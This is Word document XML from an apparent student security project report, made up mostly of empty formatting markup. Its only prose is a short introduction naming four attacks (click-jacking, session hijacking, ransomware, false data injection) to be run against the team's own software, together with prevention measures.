    <w:p w14:paraId="74B62FE0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C579F69" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3C83" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D3E5D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E4849" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7CB78" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A5A837" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3315ED" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD1E09" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5F957" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB4FAE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC8E38" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA8C32C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24545E1B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AAF398" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc48945"/>
      <w:r>
        <w:t xml:space="preserve">INTRODUCTION </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="604FFA7D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7749794E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF94C1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="21" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Information Security is not only about securing information from unauthorized access. Information Security is basically the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording or destruction of information. Information can be physical or electronic one. Information can be anything like Your details or we can say your profile on social media, your data in mobile phone, your biometrics etc. Thus, Information Security spans so many research areas like Cryptography, Mobile Computing, Cyber Forensics, Online </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Social Media</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA8DD9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0A097" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="21" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In our project, we are going to execute 4 attacks on a custom software. The attacks are: Click-jacking, Session Hijacking, Ransomware Attack, False Data Injection Attack. We have also discussed about how to prevent these attacks.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D83C4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34D7E9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="21" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let us look at the software we built for this project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BDA16" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA7308" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BC941" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04AA2A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6100E84B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC79AE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14A997DD" wp14:editId="4933A8CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39888" name="Group 3988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00" name="Shape 494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01" name="Shape 494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02" name="Shape 494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03" name="Shape 494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04" name="Shape 494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88" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49405" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49406" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49407" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49408" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4940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5DDF2D5D" wp14:editId="55DC3CC6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39891" name="Group 3989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10" name="Shape 494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1" name="Shape 494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12" name="Shape 494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3" name="Shape 494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14" name="Shape 494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91" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49415" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49416" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49417" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49418" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4941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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773512C0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D4A68" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC5EF5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3593BB6A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89A640" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBBCFCC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FAA56" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D68E4A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1DA00D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491CD2A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878B82C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E49BF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A01575" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263E0A6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE3484" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221A1AA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F43DE63" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B73776" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="38"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D765E2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C7BE5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc48946"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SYSTEM ARCHITECTURE </w:t>
      </w:r>
